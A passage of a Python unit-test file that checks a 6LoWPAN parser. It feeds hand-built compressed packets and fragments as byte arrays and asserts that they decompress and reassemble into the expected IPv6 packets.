ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x14, 0x11, 0x40, 0xfe, 0x80, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17, 0x16, 0x33, 0x16, 0x34,
0x00, 0x14, 0xcf, 0x63, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00,
0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
parser = create_default_lowpan_parser(context_manager=None)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_udp_and_without_hbh_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0x7e, 0x33, 0xf0, 0x16, 0x33, 0x16, 0x34, 0x04, 0xd2, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x14, 0x11, 0x40, 0xfe, 0x80, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17, 0x16, 0x33, 0x16, 0x34,
0x00, 0x14, 0xcf, 0x63, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00,
0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
parser = create_default_lowpan_parser(context_manager=None)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_uncompressed_udp_and_with_uncompressed_hbh_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0x33, 0x00, 0x11, 0x00, 0x6d, 0x04, 0x40, 0x02, 0x00, 0x18,
0x16, 0x33, 0x16, 0x34, 0x00, 0x0c, 0x04, 0xd2, 0x80, 0x00, 0xfa,
0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x40, 0xfe, 0x80, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17, 0x11, 0x00, 0x6d, 0x04,
0x40, 0x02, 0x00, 0x18, 0x16, 0x33, 0x16, 0x34, 0x00, 0x14, 0xcf,
0x63, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92,
0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
parser = create_default_lowpan_parser(context_manager=None)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_uncompressed_udp_and_with_compressed_hbh_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0x7e, 0x33, 0xe0, 0x11, 0x06, 0x6d, 0x04, 0x40, 0x02, 0x00, 0x18,
0x16, 0x33, 0x16, 0x34, 0x00, 0x0c, 0x04, 0xd2, 0x80, 0x00, 0xfa,
0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x40, 0xfe, 0x80, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17, 0x11, 0x00, 0x6d, 0x04,
0x40, 0x02, 0x00, 0x18, 0x16, 0x33, 0x16, 0x34, 0x00, 0x14, 0xcf,
0x63, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92,
0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
parser = create_default_lowpan_parser(context_manager=None)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_udp_and_with_compressed_hbh_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0x7e, 0x33, 0xe1, 0x06, 0x6d, 0x04, 0x40, 0x02, 0x00, 0x18, 0xf0,
0x16, 0x33, 0x16, 0x34, 0x04, 0xd2, 0x80, 0x00, 0xfa, 0xa5, 0x0b,
0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x40, 0xfe, 0x80, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17, 0x11, 0x00, 0x6d, 0x04,
0x40, 0x02, 0x00, 0x18, 0x16, 0x33, 0x16, 0x34, 0x00, 0x14, 0xcf,
0x63, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92,
0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
parser = create_default_lowpan_parser(context_manager=None)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
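    # The following ICMPv6 tests exercise context-based (stateful) address
    # compression: lowpan.Context entries installed in the ContextManager
    # provide the prefixes referenced by the SCI/DCI context identifiers.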
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xd5, 0xaa, 0x3a, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11,
0x01, 0x36, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x01, 0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00, 0x97, 0xf3,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[10] = lowpan.Context(prefix="2000:0db8::/64")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_1(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xd5, 0xaa, 0x3a, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11,
0x01, 0x36, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x01, 0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00, 0x97, 0xf3,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[10] = lowpan.Context(prefix="2000:0db8::/64")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_2(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xf0, 0xa0, 0x3a, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00,
0x00, 0x25, 0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00, 0x00, 0x25,
0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00, 0xb3, 0xf3,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[10] = lowpan.Context(prefix="2000:0db8::/64")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_3(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xd5, 0xaa, 0x3a, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11,
0x01, 0x36, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x01, 0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00, 0x97, 0xf3,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[10] = lowpan.Context(prefix="2000:0db8::/64")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_4(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xf5, 0xaa, 0x3a, 0x36, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff,
0x18, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92,
0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00, 0x97, 0xf4,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[10] = lowpan.Context(prefix="2000:0db8::/64")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_5(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xf7, 0xac, 0x3a, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00,
0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00, 0x00, 0x25,
0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00, 0xb3, 0xf3,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[10] = lowpan.Context(prefix="2000:0db8::/64")
context_manager[12] = lowpan.Context(
prefix="200d:1456:1255:0000:2514:46ff:fedd:2afe/128")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_6(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xf0, 0xc0, 0x3a, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x54, 0x00,
0x00, 0x12, 0x54, 0x11, 0xff, 0xfe, 0x1c, 0x7e, 0xff, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x0d, 0x14,
0x56, 0x12, 0x55, 0x00, 0x00, 0x25, 0x14, 0x46, 0xff, 0xfe, 0xdd,
0x2a, 0xfe, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x54, 0x00, 0x00, 0x12,
0x54, 0x11, 0xff, 0xfe, 0x1c, 0x7e, 0xff, 0x80, 0x00, 0xa5, 0x40,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[12] = lowpan.Context(
prefix="200d:1456:1255:0000:2514:46ff:fedd:2afe/128")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_7(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xd0, 0xd0, 0x3a, 0x00, 0x02, 0x98, 0xff, 0xfe, 0x22, 0x12,
0x00, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00, 0x00, 0x25, 0x14,
0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00, 0xfa, 0xa5, 0x0b,
0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0xaa, 0xbb, 0xcc,
0xdd, 0x00, 0x00, 0x00, 0x00, 0x77, 0x82, 0x98, 0xff, 0xfe, 0x22,
0x12, 0x00, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00, 0x00, 0x25,
0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00, 0xf5, 0x28,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[13] = lowpan.Context(
prefix="AABB:CCDD:0000:0000:7796::/75")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_8(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xf0, 0xd0, 0x3a, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00,
0x00, 0x25, 0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0xaa, 0xbb, 0xcc,
0xdd, 0x00, 0x00, 0x00, 0x00, 0x77, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00, 0x00, 0x25,
0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00, 0xf5, 0x11,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[13] = lowpan.Context(
prefix="AABB:CCDD:0000:0000:7796::/75")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_9(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xf0, 0xd0, 0x3a, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00,
0x00, 0x25, 0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0xaa, 0xbb, 0xcc,
0xdd, 0x00, 0x00, 0x00, 0x00, 0x77, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00, 0x00, 0x25,
0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00, 0xf5, 0x11,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[13] = lowpan.Context(
prefix="AABB:CCDD:0000:0000:7796::/75")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
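    # Fragment reassembly (RFC 4944): a FRAG1 header carries an 11-bit
    # datagram size and a 16-bit tag (here 0xC5 0x00 -> size 0x500 = 1280,
    # tag 0x319F); FRAGN headers repeat size and tag and add an offset in
    # 8-octet units. The parser returns None until every fragment of the
    # datagram has been received, regardless of arrival order.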
def test_should_defragment_big_IPv6_packet_when_parse_method_called_with_fragments_in_random_order(
self):
# GIVEN
fragment_1 = bytearray([
0xC5, 0x00, 0x31, 0x9F, 0x7A, 0x33, 0x3A, 0x80, 0x00, 0xFA, 0xA5,
0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66,
0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3,
0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54, 0x12, 0x43, 0x53,
0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77,
0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53,
0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54,
0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x80,
0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53,
0x11, 0x4C, 0x66, 0x4E
])
fragment_2 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x11, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66,
0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44,
0x54, 0x12, 0xa3, 0x53, 0x11, 0x44, 0x66, 0xFE, 0x92, 0xBB, 0x53,
0x1A, 0x44, 0x66, 0x77, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44,
0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3,
0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92,
0xBB, 0x53, 0x1A, 0x80, 0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04,
0x4E, 0x92, 0x1B, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x22, 0xBB, 0x53,
0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54,
0x01, 0xAA
])
fragment_3 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x1D, 0x44, 0x54, 0x12, 0xD3, 0x53, 0x11,
0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99,
0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A,
0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01,
0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0xC0, 0x00,
0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11,
0x44, 0xCC, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99,
0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54, 0x12,
0x43, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBC, 0x53, 0x1A, 0x44,
0x66, 0x77
])
fragment_4 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x29, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11,
0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15,
0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E,
0x92, 0xBB, 0x53, 0x1A, 0x80, 0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00,
0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB,
0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC,
0x54, 0x01, 0xAA, 0x44, 0x54, 0x12, 0x43, 0x53, 0x11, 0x44, 0x66,
0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x1A, 0x92,
0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66,
0x77, 0x99
])
